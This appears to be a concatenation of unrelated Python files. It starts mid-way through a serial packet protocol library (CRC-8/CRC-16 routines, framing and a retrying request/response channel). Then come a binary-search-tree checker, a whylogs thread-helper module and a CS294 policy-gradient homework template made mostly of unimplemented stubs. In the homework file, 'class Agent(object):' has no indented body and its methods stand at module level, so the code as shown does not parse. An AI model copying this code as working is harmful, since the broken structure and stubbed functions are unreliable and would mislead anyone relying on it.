        The updated remainder, masked to `bitwidth` bits.
    """
    topbit = (1 << (bitwidth - 1))

    # Bring the next byte into the remainder.
    remainder ^= (value << (bitwidth - 8))
    for bitnumber in range(0, 8):
        if (remainder & topbit):
            remainder = (remainder << 1) ^ polynomial
        else:
            remainder = (remainder << 1)

    return remainder & ((1 << bitwidth) - 1)

def calc_crc8(remainder, value):
    """CRC-8 (polynomial CRC8_DEFAULT) over one byte or an iterable of bytes."""
    if isinstance(value, bytearray) or isinstance(value, bytes) or isinstance(value, list):
        for byte in value:
            if not isinstance(byte, int):
                byte = ord(byte)
            remainder = calc_crc(remainder, byte, CRC8_DEFAULT, 8)
    else:
        # BUG FIX: this branch previously referenced the undefined name `byte`
        # instead of `value`, so feeding a single scalar byte raised NameError.
        remainder = calc_crc(remainder, value, CRC8_DEFAULT, 8)
    return remainder

def calc_crc16(remainder, value):
    """CRC-16 (polynomial CRC16_DEFAULT) over one byte or an iterable of bytes."""
    if isinstance(value, bytearray) or isinstance(value, bytes) or isinstance(value, list):
        for byte in value:
            if not isinstance(byte, int):
                byte = ord(byte)
            remainder = calc_crc(remainder, byte, CRC16_DEFAULT, 16)
    else:
        remainder = calc_crc(remainder, value, CRC16_DEFAULT, 16)
    return remainder
# Can be verified with http://www.sunshine2k.de/coding/javascript/crc/crc_js.html:
#print(hex(calc_crc8(0x12, [1, 2, 3, 4, 5, 0x10, 0x13, 0x37])))
#print(hex(calc_crc16(0xfeef, [1, 2, 3, 4, 5, 0x10, 0x13, 0x37])))
class DeviceInitException(Exception):
    """Raised when a device fails to initialize."""
    pass
class ChannelDamagedException(Exception):
    """
    Raised when the channel is temporarily broken and a
    resend of the message might be successful.
    """
    pass
class ChannelBrokenException(Exception):
    """
    Raised when the channel is permanently broken and no
    further communication should be attempted.
    """
    pass
class StreamSource(ABC):
    """Abstract producer of raw bytes (see implementations for semantics)."""
    @abc.abstractmethod
    def get_bytes(self, n_bytes, deadline):
        pass
class StreamSink(ABC):
    """Abstract consumer of raw bytes."""
    @abc.abstractmethod
    def process_bytes(self, bytes):
        pass
class PacketSource(ABC):
    """Abstract producer of whole packets."""
    @abc.abstractmethod
    def get_packet(self, deadline):
        pass
class PacketSink(ABC):
    """Abstract consumer of whole packets."""
    @abc.abstractmethod
    def process_packet(self, packet):
        pass
class StreamToPacketSegmenter(StreamSink):
    """Reassembles a raw byte stream into framed packets.

    Frame layout: a 3-byte header [SYNC_BYTE, payload length, CRC8 over the
    header] followed by the payload plus a 2-byte CRC16 trailer.
    """
    def __init__(self, output):
        self._header = []
        self._packet = []
        self._packet_length = 0
        self._output = output

    def process_bytes(self, bytes):
        """
        Processes an arbitrary number of bytes. If one or more full packets
        are received, they are sent to this instance's output PacketSink.
        Incomplete packets are buffered between subsequent calls to this function.
        """
        for byte in bytes:
            if (len(self._header) < 3):
                # Process header byte
                self._header.append(byte)
                if (len(self._header) == 1) and (self._header[0] != SYNC_BYTE):
                    # Not a sync byte: drop it and keep scanning for a frame.
                    self._header = []
                elif (len(self._header) == 2) and (self._header[1] & 0x80):
                    self._header = [] # TODO: support packets larger than 128 bytes
                elif (len(self._header) == 3) and calc_crc8(CRC8_INIT, self._header):
                    # CRC8 over all 3 header bytes must be zero for a valid header.
                    self._header = []
                elif (len(self._header) == 3):
                    # +2 accounts for the trailing CRC16 bytes.
                    self._packet_length = self._header[1] + 2
            else:
                # Process payload byte
                self._packet.append(byte)

            # If both header and packet are fully received, hand it on to the packet processor
            if (len(self._header) == 3) and (len(self._packet) == self._packet_length):
                if calc_crc16(CRC16_INIT, self._packet) == 0:
                    # Deliver the payload without its CRC16 trailer; frames
                    # with a bad CRC are silently dropped.
                    self._output.process_packet(self._packet[:-2])
                self._header = []
                self._packet = []
                self._packet_length = 0
class StreamBasedPacketSink(PacketSink):
    """Frames outgoing packets onto a byte-stream sink."""

    def __init__(self, output):
        self._output = output

    def process_packet(self, packet):
        if (len(packet) >= MAX_PACKET_SIZE):
            raise NotImplementedError("packet larger than 127 currently not supported")

        # Header: sync byte, payload length, then a CRC8 over those two bytes.
        header = bytearray((SYNC_BYTE, len(packet)))
        header.append(calc_crc8(CRC8_INIT, header))

        self._output.process_bytes(header)
        self._output.process_bytes(packet)

        # append CRC in big endian
        self._output.process_bytes(
            struct.pack('>H', calc_crc16(CRC16_INIT, packet)))
class PacketFromStreamConverter(PacketSource):
    """Extracts framed packets from an underlying byte-stream source."""
    def __init__(self, input):
        self._input = input

    def get_packet(self, deadline):
        """
        Requests bytes from the underlying input stream until a full packet is
        received or the deadline is reached, in which case None is returned. A
        deadline before the current time corresponds to non-blocking mode.
        """
        while True:
            header = bytes()

            # TODO: sometimes this call hangs, even though the device apparently sent something
            # Byte 1: must be the sync byte or we resynchronize.
            header = header + self._input.get_bytes_or_fail(1, deadline)
            if (header[0] != SYNC_BYTE):
                #print("sync byte mismatch")
                continue

            # Byte 2: payload length; MSB set is reserved for longer packets.
            header = header + self._input.get_bytes_or_fail(1, deadline)
            if (header[1] & 0x80):
                #print("packet too large")
                continue # TODO: support packets larger than 128 bytes

            # Byte 3: header CRC8; CRC over all 3 bytes must come out zero.
            header = header + self._input.get_bytes_or_fail(1, deadline)
            if calc_crc8(CRC8_INIT, header) != 0:
                #print("crc8 mismatch")
                continue

            # Payload plus the 2-byte CRC16 trailer.
            packet_length = header[1] + 2
            #print("wait for {} bytes".format(packet_length))
            packet = self._input.get_bytes_or_fail(packet_length, deadline)

            if calc_crc16(CRC16_INIT, packet) != 0:
                #print("crc16 mismatch")
                continue
            # Valid frame: return the payload without the CRC16 trailer.
            return packet[:-2]
class Channel(PacketSink):
    """Sequenced request/response channel over a PacketSource/PacketSink pair."""

    # Choose these parameters to be sensible for a specific transport layer
    _resend_timeout = 5.0 # [s]
    _send_attempts = 5

    def __init__(self, name, input, output, cancellation_token, logger):
        """
        Params:
        input: A PacketSource where this channel will source packets from on
               demand. Alternatively packets can be provided to this channel
               directly by calling process_packet on this instance.
        output: A PacketSink where this channel will put outgoing packets.
        """
        self._name = name
        self._input = input
        self._output = output
        self._logger = logger
        self._outbound_seq_no = 0
        # CRC of the remote interface definition, appended as a trailer so the
        # device can reject requests built against a stale interface.
        self._interface_definition_crc = 0
        # seq_no -> Event signalled when the matching ACK arrives.
        self._expected_acks = {}
        # seq_no -> response payload, filled in just before the ACK event fires.
        self._responses = {}
        self._my_lock = threading.Lock()
        self._channel_broken = Event(cancellation_token)
        self.start_receiver_thread(Event(self._channel_broken))

    def start_receiver_thread(self, cancellation_token):
        """
        Starts the receiver thread that processes incoming messages.
        The thread quits as soon as the channel enters a broken state.
        """
        def receiver_thread():
            error_ctr = 0
            try:
                # Give up after 10 consecutive (undampened) channel errors.
                while (not cancellation_token.is_set() and not self._channel_broken.is_set()
                        and error_ctr < 10):
                    # Set an arbitrary deadline because the get_packet function
                    # currently doesn't support a cancellation_token
                    deadline = time.monotonic() + 1.0
                    try:
                        response = self._input.get_packet(deadline)
                    except TimeoutError:
                        continue # try again
                    except ChannelDamagedException:
                        error_ctr += 1
                        continue # try again
                    if (error_ctr > 0):
                        # A successful reception decays the error counter.
                        error_ctr -= 1
                    # Process response
                    # This should not throw an exception, otherwise the channel breaks
                    self.process_packet(response)
                #print("receiver thread is exiting")
            except Exception:
                self._logger.debug("receiver thread is exiting: " + traceback.format_exc())
            finally:
                # Any exit path marks the channel broken for all waiters.
                self._channel_broken.set()
        t = threading.Thread(target=receiver_thread)
        t.daemon = True
        t.start()

    def remote_endpoint_operation(self, endpoint_id, input, expect_ack, output_length):
        # Performs one request on a remote endpoint, optionally waiting for
        # (and retrying until) an ACK; returns the response payload or None.
        if input is None:
            input = bytearray(0)
        if (len(input) >= 128):
            raise Exception("packet larger than 127 currently not supported")

        if (expect_ack):
            # The MSB of the endpoint ID requests an ACK from the device.
            endpoint_id |= 0x8000

        # Sequence numbers are 15-bit and allocated under the lock.
        self._my_lock.acquire()
        try:
            self._outbound_seq_no = ((self._outbound_seq_no + 1) & 0x7fff)
            seq_no = self._outbound_seq_no
        finally:
            self._my_lock.release()
        seq_no |= 0x80 # FIXME: we hardwire one bit of the seq-no to 1 to avoid conflicts with the ascii protocol
        packet = struct.pack('<HHH', seq_no, endpoint_id, output_length)
        packet = packet + input

        # NOTE(review): this CRC is computed but never used; the trailer below
        # carries either the protocol version or the interface-definition CRC.
        crc16 = calc_crc16(CRC16_INIT, packet)
        if (endpoint_id & 0x7fff == 0):
            # Endpoint 0 (the interface definition itself) is guarded by the
            # protocol version rather than the interface CRC.
            trailer = PROTOCOL_VERSION
        else:
            trailer = self._interface_definition_crc
        #print("append trailer " + trailer)
        packet = packet + struct.pack('<H', trailer)

        if (expect_ack):
            ack_event = Event()
            self._expected_acks[seq_no] = ack_event
            try:
                attempt = 0
                while (attempt < self._send_attempts):
                    self._my_lock.acquire()
                    try:
                        self._output.process_packet(packet)
                    except ChannelDamagedException:
                        # Transient transport error: retry the send.
                        attempt += 1
                        continue # resend
                    except TimeoutError:
                        attempt += 1
                        continue # resend
                    finally:
                        self._my_lock.release()
                    # Wait for ACK until the resend timeout is exceeded
                    try:
                        if wait_any(self._resend_timeout, ack_event, self._channel_broken) != 0:
                            raise ChannelBrokenException()
                    except TimeoutError:
                        attempt += 1
                        continue # resend
                    return self._responses.pop(seq_no)
                # TODO: record channel statistics
                raise ChannelBrokenException() # Too many resend attempts
            finally:
                # Always unregister the pending ACK and drop any stale response.
                self._expected_acks.pop(seq_no)
                self._responses.pop(seq_no, None)
        else:
            # fire and forget
            self._output.process_packet(packet)
            return None

    def remote_endpoint_read_buffer(self, endpoint_id):
        """
        Handles reads from long endpoints
        """
        # TODO: handle device that could (maliciously) send infinite stream
        buffer = bytes()
        while True:
            chunk_length = 512
            # The current read offset is sent as the request payload; an empty
            # chunk signals the end of the buffer.
            chunk = self.remote_endpoint_operation(endpoint_id, struct.pack("<I", len(buffer)), True, chunk_length)
            if (len(chunk) == 0):
                break
            buffer += chunk
        return buffer

    def process_packet(self, packet):
        #print("process packet")
        packet = bytes(packet)
        if (len(packet) < 2):
            raise Exception("packet too short")

        # First two bytes are the little-endian sequence number.
        seq_no = struct.unpack('<H', packet[0:2])[0]

        if (seq_no & 0x8000):
            # MSB set: this is an ACK/response to one of our requests.
            seq_no &= 0x7fff
            ack_signal = self._expected_acks.get(seq_no, None)
            if (ack_signal):
                # Store the payload before waking the waiting sender.
                self._responses[seq_no] = packet[2:]
                ack_signal.set()
                #print("received ack for packet " + str(seq_no))
            else:
                print("received unexpected ACK: " + str(seq_no))
        else:
            #if (calc_crc16(CRC16_INIT, struct.pack('<HBB', PROTOCOL_VERSION, packet[-2], packet[-1]))):
            #    raise Exception("CRC16 mismatch")
            print("endpoint requested")
            # TODO: handle local endpoint operation
|
is_bst.py | #!/usr/bin/python3
import sys, threading
sys.setrecursionlimit(10**9) # max depth of recursion
threading.stack_size(2**30) # new thread will get stack of such size
result = []  # in-order key sequence produced by the most recent traversal

def inordertraversal(tree, root=0):
    """Append the keys of the subtree rooted at index *root* to `result` in-order.

    tree[i] == [key, left_index, right_index]; an index of -1 means "no child".
    """
    if root == -1:
        return
    inordertraversal(tree, tree[root][1])
    result.append(tree[root][0])
    inordertraversal(tree, tree[root][2])

def IsBinarySearchTree(tree):
    """Return True iff *tree* satisfies the BST property.

    A tree is accepted when its in-order key sequence is non-decreasing;
    the empty tree is trivially a BST.
    """
    if len(tree) == 0:
        return True
    # Bug fix: reset the shared accumulator, otherwise a second call would see
    # stale keys from the previous traversal and could wrongly report INCORRECT.
    del result[:]
    inordertraversal(tree)
    return all(result[i] <= result[i + 1] for i in range(len(result) - 1))
def main():
    """Read a tree from stdin (node count, then `key left right` per line) and print the verdict."""
    node_count = int(input().strip())
    tree = [list(map(int, input().strip().split())) for _ in range(node_count)]
    if IsBinarySearchTree(tree):
        print("CORRECT")
    else:
        print("INCORRECT")
threading.Thread(target=main).start()
|
utils.py | import asyncio
import atexit
import logging
import threading
from functools import partial, wraps
from typing import List
# Environment-variable name that disables async behaviour in whylogs.
# NOTE(review): not referenced in this chunk — presumably read elsewhere; confirm.
_NO_ASYNC = "WHYLOGS_NO_ASYNC"
_logger = logging.getLogger(__name__)
# Background threads spawned by async_wrap; joined at interpreter exit.
_threads: List[threading.Thread] = []
def _do_wrap(func):
    """Wrap the synchronous callable *func* into a coroutine function.

    The returned coroutine runs func(*args, **kwargs) in *executor* (or the
    loop's default executor when executor is None), so the call does not block
    the event loop. A specific loop may be supplied via the keyword-only
    ``loop`` argument; otherwise the currently running loop is used.
    """
    @wraps(func)
    async def run(*args, loop=None, executor=None, **kwargs):
        if loop is None:
            # Bug fix: asyncio.get_event_loop() is deprecated inside a running
            # coroutine and may create a new, unrelated loop in a non-main
            # thread; get_running_loop() is correct here because this line can
            # only execute while a loop is running.
            loop = asyncio.get_running_loop()
        pfunc = partial(func, *args, **kwargs)
        return await loop.run_in_executor(executor, pfunc)
    return run
def async_wrap(func, *args, **kwargs):
    """Run func(*args, **kwargs) on a freshly started background thread.

    Note: despite the name, no asyncio is involved — the callable simply runs
    on its own threading.Thread. The thread is recorded in the module-level
    _threads list so _wait_for_children() can join it at interpreter exit.

    Returns:
        threading.Thread: the already-started thread executing *func*.
    """
    worker = threading.Thread(target=func, args=args, kwargs=kwargs)
    worker.start()
    _threads.append(worker)
    return worker
@atexit.register
def _wait_for_children():
    """Join every thread spawned via async_wrap before the interpreter exits.

    This ensures pending log writes finish before the process terminates.
    """
    for t in _threads:
        try:
            t.join()
        # Bug fix: the original bare `except:` also swallowed SystemExit and
        # KeyboardInterrupt; catch only ordinary errors and keep joining the
        # remaining threads.
        except Exception:
            _logger.exception("Failed to await task")
|
train_pg_f18.py | """
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Michael Chang and Soroush Nasiriany
"""
import numpy as np
import tensorflow as tf
import gym
import logz
import os
import time
import inspect
from multiprocessing import Process
import torch
#============================================================================================#
# Utilities
#============================================================================================#
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def build_mlp(input, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None):
    """
    Builds a feedforward neural network
    arguments:
        input: placeholder variable for the state (batch_size, input_size)
        output_size: size of the output layer
        scope: variable scope of the network
        n_layers: number of hidden layers
        size: dimension of the hidden layer
        activation: activation of the hidden layers
        output_activation: activation of the ouput layers
    returns:
        output placeholder of the network (the result of a forward pass)
    Hint: use tf.layers.dense
    """
    # YOUR CODE HERE
    # Homework stub: remove the raise once the network is implemented.
    raise NotImplementedError
    # Unreachable template line; `output_placeholder` is undefined until implemented.
    return output_placeholder
def pathlength(path):
    """Return the number of timesteps in *path* (the length of its reward sequence)."""
    rewards = path["reward"]
    return len(rewards)
def setup_logger(logdir, locals_):
    """Configure logz output to *logdir* and record train_PG's call parameters.

    logdir: directory logz writes experiment logs to.
    locals_: the locals() of the train_PG call, used to look up argument values;
        missing names are recorded as None.
    """
    # Configure output directory for logging
    logz.configure_output_dir(logdir)
    # Log experimental parameters
    # Bug fix: inspect.getargspec was deprecated for years and removed in
    # Python 3.11; getfullargspec returns the same positional-argument list.
    args = inspect.getfullargspec(train_PG)[0]
    params = {k: locals_[k] if k in locals_ else None for k in args}
    logz.save_params(params)
#============================================================================================#
# Policy Gradient
#============================================================================================#
class Agent(object):
def __init__(self, computation_graph_args, sample_trajectory_args, estimate_return_args):
    """Store the hyperparameters from the three configuration dicts as attributes."""
    super(Agent, self).__init__()
    graph_cfg = computation_graph_args
    traj_cfg = sample_trajectory_args
    return_cfg = estimate_return_args
    # Computation-graph hyperparameters.
    self.ob_dim = graph_cfg['ob_dim']
    self.ac_dim = graph_cfg['ac_dim']
    self.discrete = graph_cfg['discrete']
    self.size = graph_cfg['size']
    self.n_layers = graph_cfg['n_layers']
    self.learning_rate = graph_cfg['learning_rate']
    # Trajectory-sampling settings.
    self.animate = traj_cfg['animate']
    self.max_path_length = traj_cfg['max_path_length']
    self.min_timesteps_per_batch = traj_cfg['min_timesteps_per_batch']
    # Return-estimation settings.
    self.gamma = return_cfg['gamma']
    self.reward_to_go = return_cfg['reward_to_go']
    self.nn_baseline = return_cfg['nn_baseline']
    self.normalize_advantages = return_cfg['normalize_advantages']
def init_tf_sess(self):
    """Create a single-threaded TF session, enter it as the default, and init all variables."""
    tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
    self.sess = tf.Session(config=tf_config)
    # Entering makes this the default session, so .run() below needs no session arg.
    self.sess.__enter__() # equivalent to `with self.sess:`
    tf.global_variables_initializer().run() #pylint: disable=E1101
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def define_placeholders(self):
    """
    Placeholders for batch batch observations / actions / advantages in policy gradient
    loss function.
    See Agent.build_computation_graph for notation
    returns:
        sy_ob_no: placeholder for observations
        sy_ac_na: placeholder for actions
        sy_adv_n: placeholder for advantages
    """
    # Homework stub: remove the raise once sy_adv_n is defined below.
    raise NotImplementedError
    # Unreachable template code until the raise above is removed.
    sy_ob_no = tf.placeholder(shape=[None, self.ob_dim], name="ob", dtype=tf.float32)
    if self.discrete:
        # Discrete actions are integer indices into the action set.
        sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
    else:
        # Continuous actions are float vectors of dimension ac_dim.
        sy_ac_na = tf.placeholder(shape=[None, self.ac_dim], name="ac", dtype=tf.float32)
    # YOUR CODE HERE
    sy_adv_n = None
    return sy_ob_no, sy_ac_na, sy_adv_n
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def policy_forward_pass(self, sy_ob_no):
    """ Constructs the symbolic operation for the policy network outputs,
        which are the parameters of the policy distribution p(a|s)
        arguments:
            sy_ob_no: (batch_size, self.ob_dim)
        returns:
            the parameters of the policy.
            if discrete, the parameters are the logits of a categorical distribution
                over the actions
                sy_logits_na: (batch_size, self.ac_dim)
            if continuous, the parameters are a tuple (mean, log_std) of a Gaussian
                distribution over actions. log_std should just be a trainable
                variable, not a network output.
                sy_mean: (batch_size, self.ac_dim)
                sy_logstd: (self.ac_dim,)
        Hint: use the 'build_mlp' function to output the logits (in the discrete case)
            and the mean (in the continuous case).
            Pass in self.n_layers for the 'n_layers' argument, and
            pass in self.size for the 'size' argument.
    """
    # Homework stub: remove the raise once the policy network is implemented.
    raise NotImplementedError
    # Unreachable template code until the raise above is removed.
    if self.discrete:
        # YOUR_CODE_HERE
        sy_logits_na = None
        return sy_logits_na
    else:
        # YOUR_CODE_HERE
        sy_mean = None
        sy_logstd = None
        return (sy_mean, sy_logstd)
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def sample_action(self, policy_parameters):
    """ Constructs a symbolic operation for stochastically sampling from the policy
        distribution
        arguments:
            policy_parameters
                if discrete: logits of a categorical distribution over actions
                    sy_logits_na: (batch_size, self.ac_dim)
                if continuous: (mean, log_std) of a Gaussian distribution over actions
                    sy_mean: (batch_size, self.ac_dim)
                    sy_logstd: (self.ac_dim,)
        returns:
            sy_sampled_ac:
                if discrete: (batch_size,)
                if continuous: (batch_size, self.ac_dim)
        Hint: for the continuous case, use the reparameterization trick:
             The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
                  mu + sigma * z,         z ~ N(0, I)
             This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
    """
    # Homework stub: remove the raise once sampling is implemented.
    raise NotImplementedError
    # Unreachable template code until the raise above is removed.
    if self.discrete:
        sy_logits_na = policy_parameters
        # YOUR_CODE_HERE
        sy_sampled_ac = None
    else:
        sy_mean, sy_logstd = policy_parameters
        # YOUR_CODE_HERE
        sy_sampled_ac = None
    return sy_sampled_ac
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def get_log_prob(self, policy_parameters, sy_ac_na):
    """ Constructs a symbolic operation for computing the log probability of a set of actions
        that were actually taken according to the policy
        arguments:
            policy_parameters
                if discrete: logits of a categorical distribution over actions
                    sy_logits_na: (batch_size, self.ac_dim)
                if continuous: (mean, log_std) of a Gaussian distribution over actions
                    sy_mean: (batch_size, self.ac_dim)
                    sy_logstd: (self.ac_dim,)
            sy_ac_na:
                if discrete: (batch_size,)
                if continuous: (batch_size, self.ac_dim)
        returns:
            sy_logprob_n: (batch_size)
        Hint:
            For the discrete case, use the log probability under a categorical distribution.
            For the continuous case, use the log probability under a multivariate gaussian.
    """
    # Homework stub: remove the raise once the log-prob computation is implemented.
    raise NotImplementedError
    # Unreachable template code until the raise above is removed.
    if self.discrete:
        sy_logits_na = policy_parameters
        # YOUR_CODE_HERE
        sy_logprob_n = None
    else:
        sy_mean, sy_logstd = policy_parameters
        # YOUR_CODE_HERE
        sy_logprob_n = None
    return sy_logprob_n
def build_computation_graph(self):
    """
    Notes on notation:

    Symbolic variables have the prefix sy_, to distinguish them from the numerical values
    that are computed later in the function

    Prefixes and suffixes:
    ob - observation
    ac - action
    _no - this tensor should have shape (batch self.size /n/, observation dim)
    _na - this tensor should have shape (batch self.size /n/, action dim)
    _n  - this tensor should have shape (batch self.size /n/)

    Note: batch self.size /n/ is defined at runtime, and until then, the shape for that axis
    is None
    ----------------------------------------------------------------------------------
    loss: a function of self.sy_logprob_n and self.sy_adv_n that we will differentiate
        to get the policy gradient.
    """
    self.sy_ob_no, self.sy_ac_na, self.sy_adv_n = self.define_placeholders()
    # The policy takes in an observation and produces a distribution over the action space
    self.policy_parameters = self.policy_forward_pass(self.sy_ob_no)
    # We can sample actions from this action distribution.
    # This will be called in Agent.sample_trajectory() where we generate a rollout.
    self.sy_sampled_ac = self.sample_action(self.policy_parameters)
    # We can also compute the logprob of the actions that were actually taken by the policy
    # This is used in the loss function.
    self.sy_logprob_n = self.get_log_prob(self.policy_parameters, self.sy_ac_na)
    # ----------PROBLEM 2----------
    # Loss Function and Training Operation
    # Homework stub: minimize(None) will fail until `loss` is defined.
    loss = None # YOUR CODE HERE
    self.update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(loss)
    # ----------PROBLEM 6----------
    # Optional Baseline
    #
    # Define placeholders for targets, a loss function and an update op for fitting a
    # neural network baseline. These will be used to fit the neural network baseline.
    if self.nn_baseline:
        # Homework stub: remove the raise once the baseline fitting is implemented.
        raise NotImplementedError
        self.baseline_prediction = tf.squeeze(build_mlp(
                                self.sy_ob_no,
                                1,
                                "nn_baseline",
                                n_layers=self.n_layers,
                                size=self.size))
        # YOUR_CODE_HERE
        self.sy_target_n = None
        baseline_loss = None
        self.baseline_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(baseline_loss)
def sample_trajectories(self, itr, env):
    """Roll out episodes until at least self.min_timesteps_per_batch timesteps are collected.

    Rendering is enabled only for the first episode of every 10th iteration when
    self.animate is set. Returns (paths, timesteps_this_batch).
    """
    collected = 0
    paths = []
    while True:
        render_now = (len(paths) == 0 and (itr % 10 == 0) and self.animate)
        path = self.sample_trajectory(env, render_now)
        paths.append(path)
        collected += pathlength(path)
        if collected > self.min_timesteps_per_batch:
            break
    return paths, collected
def sample_trajectory(self, env, animate_this_episode):
    """Roll out one episode in *env*, returning observations, rewards and actions as arrays."""
    ob = env.reset()
    obs, acs, rewards = [], [], []
    steps = 0
    while True:
        if animate_this_episode:
            env.render()
            time.sleep(0.1)
        obs.append(ob)
        # ----------PROBLEM 3----------
        # Homework stub: remove the raise once the action is computed by
        # running self.sy_sampled_ac for the current observation.
        raise NotImplementedError
        ac = None # YOUR CODE HERE
        ac = ac[0]
        acs.append(ac)
        ob, rew, done, _ = env.step(ac)
        rewards.append(rew)
        steps += 1
        if done or steps > self.max_path_length:
            break
    path = {"observation" : np.array(obs, dtype=np.float32),
            "reward" : np.array(rewards, dtype=np.float32),
            "action" : np.array(acs, dtype=np.float32)}
    return path
#====================================================================================#
# ----------PROBLEM 3----------
#====================================================================================#
def sum_of_rewards(self, re_n):
    """
    Monte Carlo estimation of the Q function.

    let sum_of_path_lengths be the sum of the lengths of the paths sampled from
        Agent.sample_trajectories
    let num_paths be the number of paths sampled from Agent.sample_trajectories

    arguments:
        re_n: length: num_paths. Each element in re_n is a numpy array
            containing the rewards for the particular path
    returns:
        q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
            whose length is the sum of the lengths of the paths
    ----------------------------------------------------------------------------------
    Your code should construct numpy arrays for Q-values which will be used to compute
    advantages (which will in turn be fed to the placeholder you defined in
    Agent.define_placeholders).

    Recall that the expression for the policy gradient PG is

        PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )]

    where

        tau=(s_0, a_0, ...) is a trajectory,
        Q_t is the Q-value at time t, Q^{pi}(s_t, a_t),
        and b_t is a baseline which may depend on s_t.

    You will write code for two cases, controlled by the flag 'reward_to_go':

    Case 1: trajectory-based PG
        (reward_to_go = False)
        Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over
        entire trajectory (regardless of which time step the Q-value should be for).
        For this case, the policy gradient estimator is
            E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)]
        where
            Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}.
        Thus, you should compute
            Q_t = Ret(tau)

    Case 2: reward-to-go PG
        (reward_to_go = True)
        Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting
        from time step t. Thus, you should compute
            Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'}

    Store the Q-values for all timesteps and all trajectories in a variable 'q_n',
    like the 'ob_no' and 'ac_na' above.
    """
    # YOUR_CODE_HERE
    # Homework stub: both branches are unimplemented; `q_n` is undefined until then.
    if self.reward_to_go:
        raise NotImplementedError
    else:
        raise NotImplementedError
    return q_n
def compute_advantage(self, ob_no, q_n):
    """Subtract a (possibly neural-network) baseline from the estimated Q values.

    arguments:
        ob_no: shape (sum_of_path_lengths, ob_dim) observations.
        q_n: shape (sum_of_path_lengths,) estimated Q values.
    returns:
        adv_n: shape (sum_of_path_lengths,) estimated advantages.
    """
    if not self.nn_baseline:
        # No baseline configured: the advantage is simply a copy of the Q values.
        return q_n.copy()
    # ----------PROBLEM 6----------
    # Computing Baselines: predict reward-to-go per timestep with the baseline
    # network, rescale the prediction to match the statistics (mean and std)
    # of the current batch of Q-values (hint #bl1, paired with hint #bl2 in
    # Agent.update_parameters), then subtract it from q_n.
    raise NotImplementedError
    b_n = None # YOUR CODE HERE
    return q_n - b_n
def estimate_return(self, ob_no, re_n):
    """
    Estimates the returns over a set of trajectories.

    let sum_of_path_lengths be the sum of the lengths of the paths sampled from
        Agent.sample_trajectories
    let num_paths be the number of paths sampled from Agent.sample_trajectories

    arguments:
        ob_no: shape: (sum_of_path_lengths, ob_dim)
        re_n: length: num_paths. Each element in re_n is a numpy array
            containing the rewards for the particular path
    returns:
        q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
            whose length is the sum of the lengths of the paths
        adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
            advantages whose length is the sum of the lengths of the paths
    """
    q_n = self.sum_of_rewards(re_n)
    adv_n = self.compute_advantage(ob_no, q_n)
    # ----------PROBLEM 3----------
    # Advantage Normalization
    if self.normalize_advantages:
        # On the next line, implement a trick which is known empirically to reduce variance
        # in policy gradient methods: normalize adv_n to have mean zero and std=1.
        # Homework stub: remove the raise once normalization is implemented.
        raise NotImplementedError
        adv_n = None # YOUR_CODE_HERE
    return q_n, adv_n
def update_parameters(self, ob_no, ac_na, q_n, adv_n):
    """
    Update the parameters of the policy and (possibly) the neural network baseline,
    which is trained to approximate the value function.

    arguments:
        ob_no: shape: (sum_of_path_lengths, ob_dim)
        ac_na: shape: (sum_of_path_lengths).
        q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
            whose length is the sum of the lengths of the paths
        adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
            advantages whose length is the sum of the lengths of the paths
    returns:
        nothing
    """
    # ----------PROBLEM 6----------
    # Optimizing Neural Network Baseline
    if self.nn_baseline:
        # If a neural network baseline is used, set up the targets and the inputs for the
        # baseline.
        #
        # Fit it to the current batch in order to use for the next iteration. Use the
        # baseline_update_op you defined earlier.
        #
        # Hint #bl2: Instead of trying to target raw Q-values directly, rescale the
        # targets to have mean zero and std=1. (Goes with Hint #bl1 in
        # Agent.compute_advantage.)
        # YOUR_CODE_HERE
        # Homework stub: remove the raise once the baseline fit is implemented.
        raise NotImplementedError
        target_n = None
    # ----------PROBLEM 3----------
    # Performing the Policy Update
    #
    # Call the update operation necessary to perform the policy gradient update based on
    # the current batch of rollouts.
    #
    # For debug purposes, you may wish to save the value of the loss function before
    # and after an update, and then log them below.
    # YOUR_CODE_HERE
    # Homework stub: remove the raise once the policy update is implemented.
    raise NotImplementedError
def train_PG(
        exp_name,
        env_name,
        n_iter,
        gamma,
        min_timesteps_per_batch,
        max_path_length,
        learning_rate,
        reward_to_go,
        animate,
        logdir,
        normalize_advantages,
        nn_baseline,
        seed,
        n_layers,
        size):
    """Run one complete policy-gradient training experiment.

    Builds the gym environment and the Agent's TF graph, then alternates
    between sampling trajectory batches and performing policy updates for
    n_iter iterations, logging diagnostics via logz each iteration.
    """
    start = time.time()
    # Set Up Logger
    setup_logger(logdir, locals())
    # Set Up Env
    # Make the gym environment
    env = gym.make(env_name)
    # Set random seeds
    tf.set_random_seed(seed)
    np.random.seed(seed)
    env.seed(seed)
    # Maximum length for episodes
    max_path_length = max_path_length or env.spec.max_episode_steps
    # Is this env continuous, or self.discrete?
    discrete = isinstance(env.action_space, gym.spaces.Discrete)
    # Observation and action sizes
    ob_dim = env.observation_space.shape[0]
    ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
    # Initialize Agent
